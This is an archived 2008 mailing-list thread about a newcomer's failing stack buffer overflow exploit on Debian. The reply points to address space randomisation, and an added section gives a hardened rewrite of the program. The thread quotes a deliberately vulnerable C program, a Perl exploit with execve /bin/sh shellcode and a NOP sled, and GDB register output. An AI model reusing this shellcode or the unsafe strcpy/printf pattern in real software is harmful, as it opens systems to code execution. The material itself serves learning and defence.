Re: Simple Buffer Overflow

From: Ronald van der Westen (rvdwesten@gmail.com)
Date: Mon Jan 14 2008 - 09:11:32 EST


Debian 2.6.18 is using Address Space Randomization; this means that
your stack will be at another address every run. It is not possible to
exploit this with a hardcoded return address.

Cheers,
-p

On 10 Jan 2008 02:09:46 -0000, <loki6@orange.nl> wrote:
> Hi there and thank you for reading this,
>
> I'm new to the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.
>
> As I've said, I'm new to this field and my goal is to be able to anticipate possible buffer overflow exploits.
>
> I've created this simple script, "test.c":
>
> [code]
> #include <stdio.h>
> #include <string.h>   /* needed for strcpy() */
>
> int main(int argc, char **argv){
>
>   char buffer[256];
>
>   if (argc == 1) {
>     printf("Usage: %s (input)\n", argv[0]);
>     return 1;          /* without this, argv[1] is NULL and strcpy() below crashes */
>   }
>
>   strcpy(buffer, argv[1]);   /* unbounded copy into a 256-byte buffer: the overflow under study */
>   printf(buffer);            /* user data used directly as the format string */
>
>   return 0;
> }
> [/code]
>
> Then I'm trying to exploit it with:
>
> [code]
> #!/usr/bin/perl
>
> $ret = "/x90/x9a/xbf";
>
> $shellcode = "\xb0\x0b".
> "\x99".
> "\x52".
> "\x68\x2f\x2f\x73\x68".
> "\x68\x2f\x62\x69\x6e".
> "\x89\xe3".
> "\x52".
> "\x53".
> "\x89\xe1".
> "\xcd\x80";
>
> $exploit = "\x90" x 235;
> $exploit .= $shellcode;
> $exploit .= $ret;
>
> system("./a.out $exploit");
> [/code]
>
> The shellcode is an execve /bin/sh.
>
> When I run the perl script, it simply returns my bash prompt, so the exploit didn't work.
>
> When I type 'exit' afterwards, I'm dropped from the su shell I was in previously, confirming there isn't a "/bin/sh" process.
>
> Now the funny thing is, when I overflow the buffer of a.out in gdb with:
>
> run `perl -e 'print "A"x262'`
> Program received signal SIGSEGV, Segmentation fault
> 0x08048412 in main ()
>
> it doesn't overflow the EIP, because when I use:
>
> i r
>
> it says:
>
> eip 0x8048412 0x8048412 <main+126>
>
> The first time I tried today, it overflowed the EIP correctly, and I didn't change anything.
>
> ECX is 0x41414141,
> ESP is 0x4141413d and
> EBP is 0xbf004141.
>
> Since stack and frame pointer both have 41 in them, I figure part of them is overflowed. Why not the Extended Instruction Pointer?
>
> I was wondering if someone was able to help me with this, because I really want to get the hang of this.
>
> I don't know if I got the NOP sled and return address right either, because when using GDB:
>
> x/s $esp
>
> I get:
>
> 0x4141413d: <Address 0x4141413d out of bounds
>
> I'm kinda stuck from there.
>
> My problem in short:
>
> - How do I get a reliable return address with GDB
> - How do I determine the length of the NOP sled
> - How do I test shellcode
>
> Thanks for reading this.
>
> Thanks for any help, pointers and advice.
>
> ironmonkey6
>

-- 
Ronald van der Westen
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
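The following is an added example, not code from either poster in this thread. It shows the quoted test.c with its two memory-safety defects fixed (the unbounded strcpy() and the printf() that takes user data as its format string) and adds a small check of the kernel setting the reply refers to. It assumes Linux, where the ASLR knob is the standard sysctl file /proc/sys/kernel/randomize_va_space; the helper names safe_copy() and aslr_level() are my own.

```c
/* Added example (not from the original thread): the poster's test.c hardened,
 * plus a check of the ASLR sysctl that the reply refers to.
 * Assumes Linux; /proc/sys/kernel/randomize_va_space is the standard knob. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bounded copy: returns 0 on success, -1 if src (including its NUL) does not
 * fit in dst. Unlike strcpy(), an over-long argument can never run past the
 * end of the buffer and reach the saved frame pointer / return address. */
int safe_copy(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= dstsz) {
        dst[0] = '\0';          /* leave dst a valid (empty) string */
        return -1;
    }
    memcpy(dst, src, n + 1);    /* n + 1 copies the terminating NUL */
    return 0;
}

/* Reads the kernel ASLR level: 0 = off, 1 = stack/mmap/VDSO randomized,
 * 2 = brk randomized as well. Returns -1 if the file cannot be read
 * (e.g. not Linux, or /proc not mounted). */
int aslr_level(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL)
        return -1;
    int level = -1;
    if (fscanf(f, "%d", &level) != 1)
        level = -1;
    fclose(f);
    return level;
}

int main(int argc, char **argv)
{
    char buffer[256];

    if (argc != 2) {
        /* The original fell through to strcpy(buffer, NULL) when no argument was given. */
        fprintf(stderr, "Usage: %s (input)\n", argv[0]);
        return 1;
    }
    if (safe_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buffer - 1);
        return 1;
    }
    /* Data goes in as an argument, never as the format string. */
    printf("%s\n", buffer);

    /* Run the program twice: with randomize_va_space at 1 or 2 the stack
     * address printed here changes between runs, which is the reply's point
     * about why a hard-coded return address cannot be relied on. */
    printf("randomize_va_space = %d, buffer at %p\n", aslr_level(), (void *)buffer);
    return 0;
}
```

Build with `gcc -Wall -Wformat-security test.c` and the compiler will also flag the original `printf(buffer)` pattern if it is reintroduced; the bounded copy is what turns the 262-byte input from the thread into a clean "input too long" error instead of a SIGSEGV.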


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT